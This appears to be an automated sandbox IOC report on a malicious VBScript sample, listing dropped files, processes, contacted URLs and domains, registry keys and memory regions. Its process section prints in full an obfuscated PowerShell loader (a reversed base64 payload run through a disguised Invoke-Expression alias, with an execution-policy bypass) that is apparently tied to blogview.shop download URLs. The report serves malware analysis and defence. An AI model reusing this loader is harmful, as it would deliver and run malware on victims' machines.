IOC Report
9jJ4aVtoHG.vbs

loading gif

Files

File Path
Type
Category
Malicious
9jJ4aVtoHG.vbs
ASCII text, with very long lines (1397), with CRLF, LF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jigbwgv.vwm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5g10b5x.hjp.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c' ;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64)) ;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://blogview.shop/api/values/86718771597555964672/refresh6/X
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://blogview.shop/api/values/86718771597555964672/refresh6/0213598674.txt
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://blogview.shop/api/values/refresh6
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://blogview.shop/api/values/
unknown
https://contoso.com/License
unknown
https://blogview.shop/api/values/86718771597555964672/refresh6/
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore68
unknown
https://blogview.shop/api/values/refresh6X
unknown
https://blogview.shop
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 8 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
s-part-0032.t-0009.t-msedge.net
13.107.246.60
blogview.shop
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2250022E000
trusted library allocation
page read and write
malicious
22501B60000
trusted library allocation
page read and write
malicious
7FF886E00000
trusted library allocation
page read and write
18F5F9B0000
heap
page read and write
7FF886B3B000
trusted library allocation
page read and write
22501A0E000
trusted library allocation
page read and write
2256C300000
trusted library allocation
page read and write
18F5FA51000
heap
page read and write
7FF886E60000
trusted library allocation
page read and write
2256C868000
heap
page read and write
2251000F000
trusted library allocation
page read and write
18F5FA4F000
heap
page read and write
22500430000
trusted library allocation
page read and write
7FF886E90000
trusted library allocation
page read and write
7FF886D60000
trusted library allocation
page read and write
7FF886CDA000
trusted library allocation
page read and write
22500F3F000
trusted library allocation
page read and write
7FF886E10000
trusted library allocation
page read and write
18F5F8D0000
heap
page read and write
2256C270000
trusted library allocation
page read and write
2256C3C3000
heap
page read and write
22500084000
trusted library allocation
page read and write
2256C8AC000
heap
page read and write
7FF886D30000
trusted library allocation
page read and write
2256C842000
heap
page read and write
7FF886B22000
trusted library allocation
page read and write
2256A810000
heap
page read and write
18F5FA35000
heap
page read and write
2256C9C0000
heap
page read and write
7FF886C06000
trusted library allocation
page execute and read and write
7FF886D80000
trusted library allocation
page read and write
7B9C2FB000
stack
page read and write
F454BFE000
stack
page read and write
2256AC20000
heap
page read and write
2256C980000
heap
page execute and read and write
7FF886CF0000
trusted library allocation
page execute and read and write
2256CB35000
heap
page read and write
7FF886E30000
trusted library allocation
page read and write
18F5FA57000
heap
page read and write
18F5FA54000
heap
page read and write
7B9BAFE000
stack
page read and write
22501B02000
trusted library allocation
page read and write
F454C7E000
stack
page read and write
7FF886B24000
trusted library allocation
page read and write
7FF886D90000
trusted library allocation
page read and write
7FF886B7C000
trusted library allocation
page execute and read and write
2256A8A0000
heap
page read and write
18F5FA70000
heap
page read and write
7DF40CEC0000
trusted library allocation
page execute and read and write
7FF886B40000
trusted library allocation
page read and write
2256A90A000
heap
page read and write
18F61790000
heap
page read and write
2256A902000
heap
page read and write
2256A908000
heap
page read and write
2256C250000
trusted library allocation
page read and write
2256A896000
heap
page read and write
7FF886CC0000
trusted library allocation
page read and write
22500001000
trusted library allocation
page read and write
2256C9E0000
heap
page read and write
18F5FA52000
heap
page read and write
7B9C0FE000
stack
page read and write
18F5FB70000
heap
page read and write
2256C3B0000
heap
page execute and read and write
7FF886DC0000
trusted library allocation
page read and write
2256CB3E000
heap
page read and write
2256A8C0000
heap
page read and write
2256CAC0000
heap
page execute and read and write
7FF886D70000
trusted library allocation
page read and write
2256C290000
trusted library allocation
page read and write
F4549BE000
stack
page read and write
7FF886D40000
trusted library allocation
page read and write
18F5FB60000
heap
page read and write
22501C00000
trusted library allocation
page read and write
7FF886DA0000
trusted library allocation
page read and write
18F5FA2F000
heap
page read and write
7FF886DF0000
trusted library allocation
page read and write
22510070000
trusted library allocation
page read and write
7FF886BDC000
trusted library allocation
page execute and read and write
F454FBF000
stack
page read and write
F454AFD000
stack
page read and write
F454EFE000
stack
page read and write
2256C810000
heap
page read and write
7B9C1FE000
stack
page read and write
F454DFF000
stack
page read and write
2256C2C0000
heap
page read and write
7FF886DD0000
trusted library allocation
page read and write
2256C987000
heap
page execute and read and write
2250199A000
trusted library allocation
page read and write
7FF886E20000
trusted library allocation
page read and write
7FF886B20000
trusted library allocation
page read and write
7FF886B23000
trusted library allocation
page execute and read and write
2256A8C9000
heap
page read and write
2256CAF0000
heap
page read and write
7FF886E80000
trusted library allocation
page read and write
F4548FD000
stack
page read and write
2256AC25000
heap
page read and write
2256C87C000
heap
page read and write
225101B3000
trusted library allocation
page read and write
2256A890000
heap
page read and write
18F5FAAD000
heap
page read and write
2250053F000
trusted library allocation
page read and write
7FF886D20000
trusted library allocation
page read and write
7FF886C40000
trusted library allocation
page execute and read and write
2256A904000
heap
page read and write
2256A820000
heap
page read and write
2256A94E000
heap
page read and write
F45503E000
stack
page read and write
18F5FA30000
heap
page read and write
2256C280000
heap
page readonly
7FF886DB0000
trusted library allocation
page read and write
F454CFF000
stack
page read and write
2256CB50000
heap
page read and write
18F5FB75000
heap
page read and write
7FF886B30000
trusted library allocation
page read and write
7FF886BD6000
trusted library allocation
page read and write
18F5FA50000
heap
page read and write
18F5FA36000
heap
page read and write
2250053A000
trusted library allocation
page read and write
F454B7F000
stack
page read and write
2256A8DF000
heap
page read and write
F45513B000
stack
page read and write
18F5FA29000
heap
page read and write
7B9BFFD000
stack
page read and write
2256CD00000
heap
page read and write
2256A920000
heap
page read and write
7FF886CD1000
trusted library allocation
page read and write
18F5FA70000
heap
page read and write
2256A900000
heap
page read and write
2256C84A000
heap
page read and write
7FF886D50000
trusted library allocation
page read and write
7FF886DE0000
trusted library allocation
page read and write
18F5FA2A000
heap
page read and write
7FF886E40000
trusted library allocation
page read and write
22510011000
trusted library allocation
page read and write
7B9B9FE000
stack
page read and write
7FF886D10000
trusted library allocation
page execute and read and write
F45493E000
unkown
page read and write
22501CB8000
trusted library allocation
page read and write
F454D7F000
stack
page read and write
7FF886B2D000
trusted library allocation
page execute and read and write
F454873000
stack
page read and write
2256C2D0000
trusted library allocation
page read and write
7FF886CE0000
trusted library allocation
page execute and read and write
2256CB4C000
heap
page read and write
18F5FAAE000
heap
page read and write
7FF886D02000
trusted library allocation
page read and write
18F5FA00000
heap
page read and write
22510001000
trusted library allocation
page read and write
22501A14000
trusted library allocation
page read and write
7B9BCFF000
stack
page read and write
F455B0E000
stack
page read and write
7B9BDFF000
stack
page read and write
7FF886BD0000
trusted library allocation
page read and write
18F5F9D0000
heap
page read and write
2256C8FA000
heap
page read and write
7FF886E50000
trusted library allocation
page read and write
225102EA000
trusted library allocation
page read and write
7FF886BE0000
trusted library allocation
page execute and read and write
F454A7E000
stack
page read and write
7B9B8FA000
stack
page read and write
F454E7D000
stack
page read and write
2250165A000
trusted library allocation
page read and write
2256A840000
heap
page read and write
7FF886E70000
trusted library allocation
page read and write
22500475000
trusted library allocation
page read and write
2256A8D3000
heap
page read and write
2256A948000
heap
page read and write
2256C90E000
heap
page read and write
F4550BE000
stack
page read and write
There are 159 hidden memdumps, click here to show them.